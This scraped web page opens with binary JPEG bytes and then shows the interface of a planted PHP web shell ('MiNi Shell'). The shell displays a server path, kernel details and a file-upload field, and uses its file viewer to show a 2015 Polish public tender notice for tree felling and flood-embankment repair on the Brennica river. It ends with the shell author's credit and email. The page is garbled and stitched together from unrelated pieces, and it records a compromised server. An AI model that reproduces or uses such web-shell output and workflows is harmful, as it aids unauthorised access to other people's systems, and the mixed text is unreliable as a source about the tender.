JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150902/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150902/226486-N-2015.html

<p class="kh_header"><b>Gliwice: Wycinka drzew i zakrzaczeń z wykarczowaniem pni, gniazdowym uzupełnieniem                              i ubezpieczeniem skarp w miejscach karczunku oraz remontem cząstkowym nawierzchni drogi eksploatacyjnej na obwałowaniach przeciwpowodziowych rzeki Brennicy  w km 0+040 - 12+070  m. Górki Wielkie, Górki Małe, Brenna,
 gm. Brenna, woj. śląskie</b><br>
<b>Numer ogłoszenia: 226486 - 2015; data zamieszczenia: 02.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalny Zarząd Gospodarki Wodnej w Gliwicach , ul. Sienkiewicza 2, 44-100 Gliwice, woj. śląskie, tel. 32 7774926, faks 32 7774999.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gliwice.rzgw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: administracja rządowa niezespolona.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wycinka drzew i zakrzaczeń z wykarczowaniem pni, gniazdowym uzupełnieniem                              i ubezpieczeniem skarp w miejscach karczunku oraz remontem cząstkowym nawierzchni drogi eksploatacyjnej na obwałowaniach przeciwpowodziowych rzeki Brennicy  w km 0+040 - 12+070  m. Górki Wielkie, Górki Małe, Brenna,
 gm. Brenna, woj. śląskie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wycinka drzew i zakrzaczeń z wykarczowaniem pni, gniazdowym uzupełnieniem                              i ubezpieczeniem skarp w miejscach karczunku oraz remontem cząstkowym nawierzchni drogi eksploatacyjnej na obwałowaniach przeciwpowodziowych rzeki Brennicy  w km 0+040 - 12+070  m. Górki Wielkie, Górki Małe, Brenna,
 gm. Brenna, woj. śląskie.
   Przedmiotem zamówienia objęte są następujące elementy:
1.	Ręczne ścinanie i karczowanie krzaków i podszycia wraz ze zrąbkowaniem gałęzi, oczyszczenie terenu z pozostałości po wykarczowaniu  na prawo i lewostronnych obwałowaniach rzeki Brennicy.
2.	Ręczne wykoszenie porostów, gęstych miękkich wraz z wygrabieniem ze skarp, wysuszeniem pokosu i spaleniem pozostałości na pow. 48012 [m2].
3.	Ścinanie drzew o średnicach od 10 do 95 [cm] piłą mechaniczną i ilości łącznej 594 [szt.] wraz z odwozem drewna w uzgodnione miejsce, w obrębie wycinki.
4.	Ręczne karczowanie pni o średnicy od 66 do 95 [cm] w ilości 11 [szt.] wraz z rozdrobnieniem i spaleniem karpin na miejscu.
5.	Zabudowa dołów w skarpach obwałowań po karczunku wraz z ubezpieczeniem powierzchniowym w obrębie karczunku w ilości 30 [m3] na powierzchni 300 [m2].
6.	Naprawa nawierzchni żwirowej drogi eksploatacyjnej na koronach obwałowań w łącznej ilości 15000 [m2].
Zakres prac do wykonania:
     -  ręczne ścinanie i karczowanie średniej gęstości krzaków i podszycia wraz ze    
   zrąbkowaniem gałęzi, na powierzchni 22.53 [ha].
     - oczyszczenie terenu z pozostałości po wykarczowaniu (drobne gałęzie, korzenie i kora  
       bez wrzosu) ze spaleniem na miejscu na pow. 45072 [m2].
     - ręczne wykoszenie porostów, gęstych miękkich ze skarp na pow. 48012 [m2].
- wygrabianie wykoszonych porostów ze skarp o szer. ponad 2.0 m, wysuszeniem pokosu     oraz spaleniem pozostałości na pow. 48012 [m2]
     - ścinanie drzew piłą mechaniczną (śr. 10-15 cm) w ilości 52 [szt.].
     - ścinanie drzew piłą mechaniczną (śr. 16-25 cm) w ilości 293 [szt.].
     - ścinanie drzew piłą mechaniczną (śr. 26-35 cm) w ilości 132 [szt.].
     - ścinanie drzew piłą mechaniczną (śr. 36-45 cm) w ilości 54 [szt.].
     - ścinanie drzew piłą mechaniczną (śr. 46-55 cm) w ilości 52 [szt.].
     - ścinanie drzew piłą mechaniczną (śr. 56-65 cm) w ilości 4 [szt.].
     - ścinanie drzew piłą mechaniczną (śr. 66-75 cm) w ilości 5 [szt.].
     - ścinanie drzew piłą mechaniczną (śr. 76-95 cm) w ilości 2 [szt.].
     - ręczne karczowanie pni (śr. 66-95 cm) w ilości 11 [szt.].
     - rozdrobnienie karpiny po wykarczowaniu pni o śr. ponad 65 [cm] ze spaleniem na      
   miejscu w ilości 11 [szt.].
    - ręczne roboty ziemne z transportem urobku samochodami samowyładowczymi na 
      odległość do 1 km (kat. gruntu III) o obj. 30 [m3].
    - zasypywanie dołów po bryłach korzeniowych wykarczowanych pni o głębokości do 1.5 m  
      i szerokości 2.6-4.5 m; kat. gr. III-IV o obj. 30 [m3].
    - humusowanie skarp z obsianiem przy grubości warstwy humusu 10 cm na powierzchni  
      300 [m2].
- nawierzchnia żwirowa - górna warstwa jezdni rozścielana ręcznie - grubość po zagęszczeniu            8 cm na powierzchni 15000 [m2].

Inwestor zwraca uwagę, iż roboty będące przedmiotem zamówienia prowadzone będą poza okresem lęgowym i gniazdowaniem ptactwa. Wykonawca powinien uzyskać zezwolenia na dojazd do koryt cieków po drogach prywatnych.

Wykonawca zobowiązuje się do zakupienia i zagospodarowanie we własnym zakresie drewna uzyskanego z wycinki drzew. Dokładna ilość pozyskanego drewna z wycinki drzew zostanie określona przez uprawnioną osobę wyznaczoną przez Zamawiającego.
Wykonawca zapłaci za pozyskane drewno na podstawie faktur VAT wystawionych przez zamawiającego po sporządzeniu protokołu obmiaru faktycznie pozyskanego drewna. Zasady wyceny ściętego drewna tj. sortyment, szacunek, cennik drewna określone są w Zarządzeniu Wewnętrznym Nr 22/2013 Dyrektora RZGW w Gliwicach w sprawie pobierania opłat za ścięte drzewo oraz faszynę na terenie administrowanym przez RZGW w Gliwicach..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.72.18.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości: 
 10 000 zł. (słownie:  dziesięć tysięcy zł)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należycie wykonał co najmniej 2 roboty konserwacyjne o charakterze podobnym do przedmiotu zamówienia, w tym:
            - przynajmniej 1 zadanie o wartości minimum 300 tyś zł (brutto), polegające na wycince                i karczowaniu drzew porastających obwałowania lub międzywale, uzupełnieniu ubytków             w korpusie wału wraz z ubezpieczeniem w postaci humusowania i obsiewu na obwałowaniach przeciwpowodziowych. 
Ocena spełniania przedstawionego powyżej warunku zostanie dokonana na podstawie        przedłożonych oświadczeń i dokumentów, wg zasady:  spełnia       - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony,  jeżeli Wykonawca wykaże, że będzie dysponował co najmniej 1 osobą przeznaczoną do kierowania robotami w branży wodno-melioracyjnej lub hydrotechnicznej tj.:
- posiadająca co najmniej 3-letnie doświadczenie w kierowaniu robotami konserwacyjnymi  na obwałowanych rzekach, o charakterze porównywalnym do przedmiotu zamówienia, 
- posiadającą odpowiednie uprawnienia budowlane. 
Ocena spełniania przedstawionego powyżej warunku zostanie dokonana na podstawie        przedłożonych oświadczeń i dokumentów, wg zasady:  spełnia       - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Jeżeli wykonawcy, wykazując spełnianie warunków udziału w postępowaniu o których mowa w art.22 ust.1, będą  polegać na zasobach innych podmiotów na zasadach określonych w art.26 ust.  2b ustawy Pzp, Wykonawca zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi  zasobami w trakcie  realizacji zamówienia, w szczególności przedstawiając w tym celu:
- pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych    zasobów na potrzeby wykonania zamówienia;
- przy czym w przypadku polegania na wiedzy i doświadczeniu innych podmiotów,   zobowiązanie winno określać sposób wykorzystania zasobów ww. podmiotu, charakter   stosunku, jaki będzie łączył wykonawcę z  innym podmiotem, zakres i okres udziału    innego podmiotu w realizacji zamówienia tego podmiotu w realizacji zamówienia.
  
 Zamawiający zaznacza , iż na mocy art.26 ust.2e ustawy  pzp podmiot , który zobowiązał  się do udostępnienia zasobów zgodnie z ust.2b, odpowiada solidarnie z  Wykonawcą za  szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów , chyba że za   nieudostępnienie zasobów nie ponosi winy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 94</li>
<li>2 - termin wykonania - 6</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość istotnych zmian postanowień zawartej umowy  w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej: 
     
1) Ze względu na warunki atmosferyczne uniemożliwiające prowadzenie robót określonych                     w Szczegółowej Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych. 
2) W przypadku uniemożliwienia wykonania robót przez organizacje społeczne i ekologiczne.             3) Z uwagi na ustawową zmianę podatku VAT.
4) Zmiany osób, przy pomocy których Wykonawca realizuje przedmiot umowy,  na inne spełniające warunki określone w SIWZ. 
5) W razie zaistnienia istotnej zmiany okoliczności, powodującej że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia niniejszej Umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach, w takim wypadku Wykonawca może żądać jedynie wynagrodzenia należnego z tytułu wykonania części umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gliwice.rzgw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba Zamawiającego, ul. Sienkiewicza 2, Gliwice, Wydział Zamówień Publicznych, pok. 210.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.09.2015 godzina 12:00, miejsce: siedziba Zamawiającego, ul. Sienkiewicza 2, Gliwice, sekretariat, pok. 207.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com